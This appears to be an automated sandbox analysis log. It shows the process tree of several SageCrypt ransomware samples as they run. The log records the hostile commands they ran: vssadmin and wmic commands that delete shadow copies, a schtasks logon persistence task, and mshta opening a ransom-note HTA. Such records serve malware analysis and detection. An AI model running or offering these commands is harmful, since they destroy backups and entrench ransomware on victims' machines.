                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                "C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.SageCrypt.cwv-5a6e73d2f815d35d09b0a936222091d860dcfa04ac7552df32da8abbc9fcc8d8.exe" g
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:8084
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.SageCrypt.cwv-5a6e73d2f815d35d09b0a936222091d860dcfa04ac7552df32da8abbc9fcc8d8.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  "C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.SageCrypt.cwv-5a6e73d2f815d35d09b0a936222091d860dcfa04ac7552df32da8abbc9fcc8d8.exe" g
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:8056
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.SageCrypt.cwv-5a6e73d2f815d35d09b0a936222091d860dcfa04ac7552df32da8abbc9fcc8d8.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    "C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.SageCrypt.cwv-5a6e73d2f815d35d09b0a936222091d860dcfa04ac7552df32da8abbc9fcc8d8.exe" g
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:7972
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.SageCrypt.cwv-5a6e73d2f815d35d09b0a936222091d860dcfa04ac7552df32da8abbc9fcc8d8.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      "C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.SageCrypt.cwv-5a6e73d2f815d35d09b0a936222091d860dcfa04ac7552df32da8abbc9fcc8d8.exe" g
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:8092
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.SageCrypt.cwv-5a6e73d2f815d35d09b0a936222091d860dcfa04ac7552df32da8abbc9fcc8d8.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        "C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.SageCrypt.cwv-5a6e73d2f815d35d09b0a936222091d860dcfa04ac7552df32da8abbc9fcc8d8.exe" g
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:8100
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.SageCrypt.dbh-6030b908e988e188fe5d81d7547123cea10e174a4abaf951784d4aebf691aec6.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        Trojan-Ransom.Win32.SageCrypt.dbh-6030b908e988e188fe5d81d7547123cea10e174a4abaf951784d4aebf691aec6.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:2220
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.SageCrypt.dbh-6030b908e988e188fe5d81d7547123cea10e174a4abaf951784d4aebf691aec6.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          "C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.SageCrypt.dbh-6030b908e988e188fe5d81d7547123cea10e174a4abaf951784d4aebf691aec6.exe" g
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:1992
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.SageCrypt.dbh-6030b908e988e188fe5d81d7547123cea10e174a4abaf951784d4aebf691aec6.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            "C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.SageCrypt.dbh-6030b908e988e188fe5d81d7547123cea10e174a4abaf951784d4aebf691aec6.exe" g
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:5960
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.SageCrypt.dbh-6030b908e988e188fe5d81d7547123cea10e174a4abaf951784d4aebf691aec6.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              "C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.SageCrypt.dbh-6030b908e988e188fe5d81d7547123cea10e174a4abaf951784d4aebf691aec6.exe" g
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:1660
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.SageCrypt.dbh-6030b908e988e188fe5d81d7547123cea10e174a4abaf951784d4aebf691aec6.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                "C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.SageCrypt.dbh-6030b908e988e188fe5d81d7547123cea10e174a4abaf951784d4aebf691aec6.exe" g
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                6⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:4144
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.SageCrypt.dbh-6030b908e988e188fe5d81d7547123cea10e174a4abaf951784d4aebf691aec6.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  "C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.SageCrypt.dbh-6030b908e988e188fe5d81d7547123cea10e174a4abaf951784d4aebf691aec6.exe" g
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  7⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:5784
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.SageCrypt.dbh-6030b908e988e188fe5d81d7547123cea10e174a4abaf951784d4aebf691aec6.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    "C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.SageCrypt.dbh-6030b908e988e188fe5d81d7547123cea10e174a4abaf951784d4aebf691aec6.exe" g
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    8⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:1508
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.SageCrypt.dbh-6030b908e988e188fe5d81d7547123cea10e174a4abaf951784d4aebf691aec6.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      "C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.SageCrypt.dbh-6030b908e988e188fe5d81d7547123cea10e174a4abaf951784d4aebf691aec6.exe" g
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      9⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:4932
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.SageCrypt.dbh-6030b908e988e188fe5d81d7547123cea10e174a4abaf951784d4aebf691aec6.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        "C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.SageCrypt.dbh-6030b908e988e188fe5d81d7547123cea10e174a4abaf951784d4aebf691aec6.exe" g
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:4680
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.SageCrypt.dqq-cbdacafba9218a687bd0c8d3d92353b3bdea82cf1fe205c9637ac84dc03405d2.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          Trojan-Ransom.Win32.SageCrypt.dqq-cbdacafba9218a687bd0c8d3d92353b3bdea82cf1fe205c9637ac84dc03405d2.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • Suspicious use of SetThreadContext
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:1740
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.SageCrypt.dqq-cbdacafba9218a687bd0c8d3d92353b3bdea82cf1fe205c9637ac84dc03405d2.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            Trojan-Ransom.Win32.SageCrypt.dqq-cbdacafba9218a687bd0c8d3d92353b3bdea82cf1fe205c9637ac84dc03405d2.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • Drops startup file
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:2132
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\wbem\WMIC.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              "C:\Windows\System32\wbem\WMIC.exe" process call create "cmd.exe /c vssadmin.exe delete shadows /quiet /all"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:3392
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\README_sTlLoTpq.hta"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • Blocklisted process makes network request
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • Modifies Internet Explorer settings
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:3880
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.SageCrypt.dzc-943316f7c794cf8f2bc8e3803654e6a389390eb1c90e88d02acd9bb76375cd3c.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          Trojan-Ransom.Win32.SageCrypt.dzc-943316f7c794cf8f2bc8e3803654e6a389390eb1c90e88d02acd9bb76375cd3c.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • Modifies data under HKEY_USERS
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • Modifies registry class
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • Suspicious behavior: MapViewOfSection
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:2548
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.SageCrypt.dzc-943316f7c794cf8f2bc8e3803654e6a389390eb1c90e88d02acd9bb76375cd3c.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            "C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.SageCrypt.dzc-943316f7c794cf8f2bc8e3803654e6a389390eb1c90e88d02acd9bb76375cd3c.exe" g
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:3768
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            "C:\Windows\System32\schtasks.exe" /CREATE /TN "FsJjs3Fo" /TR "C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.SageCrypt.dzc-943316f7c794cf8f2bc8e3803654e6a389390eb1c90e88d02acd9bb76375cd3c.exe" /SC ONLOGON /RL HIGHEST /F
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:1656
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\syswow64\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            "C:\Windows\syswow64\explorer.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • Enumerates connected drives
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • Sets desktop wallpaper using registry
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • Modifies data under HKEY_USERS
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • Modifies registry class
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • Suspicious behavior: MapViewOfSection
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:3388
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\syswow64\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              "C:\Windows\syswow64\explorer.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:5704
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                "C:\Windows\System32\cmd.exe" /C vssadmin.exe delete shadows /all /quiet
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:4856
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\vssadmin.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    vssadmin.exe delete shadows /all /quiet
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • Interacts with shadow copies
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:3788
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  "C:\Windows\System32\cmd.exe" /C wmic shadowcopy delete
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:4744
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\Wbem\WMIC.exe
